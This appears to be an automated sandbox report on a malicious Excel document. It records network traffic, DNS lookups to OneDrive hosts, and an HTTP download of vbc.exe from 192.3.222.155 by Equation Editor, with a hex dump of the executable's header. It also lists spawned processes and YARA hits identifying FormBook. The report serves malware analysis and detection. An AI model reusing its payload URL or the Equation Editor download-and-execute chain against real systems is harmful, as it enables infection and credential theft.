                                SSDEEP:6144:1+24gh/BSPohIzJutURE/sI/j16YhtJHUf8HslNtrF5HyY8d:1+24gh/Chk1BlUf8ctrFYxd
                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                File Icon

                                Icon Hash:e4e2aa8aa4b4bcb4

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 13, 2021 17:05:25.061503887 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.235030890 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.235114098 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.235505104 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.411304951 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.411339045 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.411360979 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.411381960 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.411465883 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.411509991 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.584945917 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.584981918 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.585006952 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.585028887 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.585056067 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.585078001 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.585099936 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.585124016 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.585215092 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.585282087 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.758759975 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.758830070 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.758867979 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.758907080 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.758944988 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.758985996 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.758991957 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759049892 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759051085 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759076118 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759094000 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759104967 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759165049 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759186983 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759239912 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759267092 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759282112 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759303093 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759319067 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759330034 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759357929 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759361982 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759394884 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759407997 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759433031 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.759438038 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.759469032 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.761244059 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.932890892 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.932924032 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.932945967 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.932962894 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.932967901 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.932986975 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.932991982 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.932996988 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933018923 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933026075 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933043003 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933048010 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933064938 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933068991 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933088064 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933096886 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933111906 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933132887 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933146954 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933151007 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933166027 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933175087 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933191061 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933197975 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933221102 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933242083 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933244944 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933249950 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933264971 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933270931 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933286905 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933296919 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933314085 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933337927 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933339119 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933357000 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933360100 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933376074 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933382034 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933397055 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933406115 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933417082 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933428049 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933439016 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933450937 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933469057 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933473110 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933490038 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933500051 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933520079 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:25.933523893 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:25.933546066 CEST8049167192.3.222.155192.168.2.22

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 13, 2021 17:06:38.585946083 CEST5216753192.168.2.228.8.8.8
                                Oct 13, 2021 17:06:40.084522963 CEST5059153192.168.2.228.8.8.8
                                Oct 13, 2021 17:07:18.294235945 CEST5780553192.168.2.228.8.8.8
                                Oct 13, 2021 17:07:18.772310019 CEST5903053192.168.2.228.8.8.8
                                Oct 13, 2021 17:07:18.845947981 CEST5918553192.168.2.228.8.8.8
                                Oct 13, 2021 17:07:19.136692047 CEST5561653192.168.2.228.8.8.8

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Oct 13, 2021 17:06:38.585946083 CEST192.168.2.228.8.8.80x9487Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                Oct 13, 2021 17:06:40.084522963 CEST192.168.2.228.8.8.80x4a4cStandard query (0)hqpyda.bl.files.1drv.comA (IP address)IN (0x0001)
                                Oct 13, 2021 17:07:18.294235945 CEST192.168.2.228.8.8.80x1a95Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                Oct 13, 2021 17:07:18.772310019 CEST192.168.2.228.8.8.80x391fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                Oct 13, 2021 17:07:18.845947981 CEST192.168.2.228.8.8.80xe966Standard query (0)hqpyda.bl.files.1drv.comA (IP address)IN (0x0001)
                                Oct 13, 2021 17:07:19.136692047 CEST192.168.2.228.8.8.80xae43Standard query (0)hqpyda.bl.files.1drv.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Oct 13, 2021 17:06:38.604048014 CEST8.8.8.8192.168.2.220x9487No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 17:06:40.188663960 CEST8.8.8.8192.168.2.220x4a4cNo error (0)hqpyda.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 17:06:40.188663960 CEST8.8.8.8192.168.2.220x4a4cNo error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 17:07:18.312407017 CEST8.8.8.8192.168.2.220x1a95No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 17:07:18.790204048 CEST8.8.8.8192.168.2.220x391fNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 17:07:18.864113092 CEST8.8.8.8192.168.2.220xe966No error (0)hqpyda.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 17:07:18.864113092 CEST8.8.8.8192.168.2.220xe966No error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 17:07:19.200906038 CEST8.8.8.8192.168.2.220xae43No error (0)hqpyda.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                Oct 13, 2021 17:07:19.200906038 CEST8.8.8.8192.168.2.220xae43No error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)

                                HTTP Request Dependency Graph

                                • 192.3.222.155

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249167192.3.222.15580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampkBytes transferredDirectionData
                                Oct 13, 2021 17:05:25.235505104 CEST0OUTGET /008008/vbc.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 192.3.222.155
                                Connection: Keep-Alive
                                Oct 13, 2021 17:05:25.411304951 CEST1INHTTP/1.1 200 OK
                                Date: Wed, 13 Oct 2021 15:05:26 GMT
                                Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
                                Last-Modified: Wed, 13 Oct 2021 09:47:27 GMT
                                ETag: "f7c00-5ce38d98ee1b4"
                                Accept-Ranges: bytes
                                Content-Length: 1014784
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/x-msdownload
                                Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 f0 09 00 00 88 05 00 00 00 00 00 2c ff 09 00 00 10 00 00 00 00 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 0f 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 0b 00 60 27 00 00 00 e0 0c 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 bc bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 8c ef 09 00 00 10 00 00 00 f0 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 64 b2 01 00 00 00 0a 00 00 b4 01 00 00 f4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 0d 00 00 00 c0 0b 00 00 00 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 60 27 00 00 00 d0 0b 00 00 28 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 00 0c 00 00 00 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0c 00 00 02 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 bc bf 00 00 00 20 0c 00 00 c0 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 ea 02 00 00 e0 0c 00 00 ea 02 00 00 92 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 00 00 00 00 00 7c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*,@@`' CODE `DATAd@BSS.idata`'(@.tls@.rdata@P.reloc @P.rsrc@P|@P


                                Code Manipulations

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Start time:17:04:22
                                Start date:13/10/2021
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                Imagebase:0x13fd70000
                                File size:28253536 bytes
                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Start time:17:04:43
                                Start date:13/10/2021
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                Imagebase:0x400000
                                File size:543304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:17:04:47
                                Start date:13/10/2021
                                Path:C:\Users\Public\vbc.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\Public\vbc.exe'
                                Imagebase:0x400000
                                File size:1014784 bytes
                                MD5 hash:A65B1815177EF9EBA7E5E894BBF65A3C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Reputation:low

                                General

                                Start time:17:06:04
                                Start date:13/10/2021
                                Path:C:\Windows\SysWOW64\DpiScaling.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\DpiScaling.exe
                                Imagebase:0x8b0000
                                File size:76800 bytes
                                MD5 hash:8C9DA2E414E713D3DAFF1F18223AE11B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                Reputation:moderate

                                General

                                Start time:17:06:06
                                Start date:13/10/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0xffa10000
                                File size:3229696 bytes
                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Start time:17:06:16
                                Start date:13/10/2021
                                Path:C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe'
                                Imagebase:0x400000
                                File size:1014784 bytes
                                MD5 hash:A65B1815177EF9EBA7E5E894BBF65A3C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Reputation:low

                                Disassembly

                                Code Analysis

                                Reset < >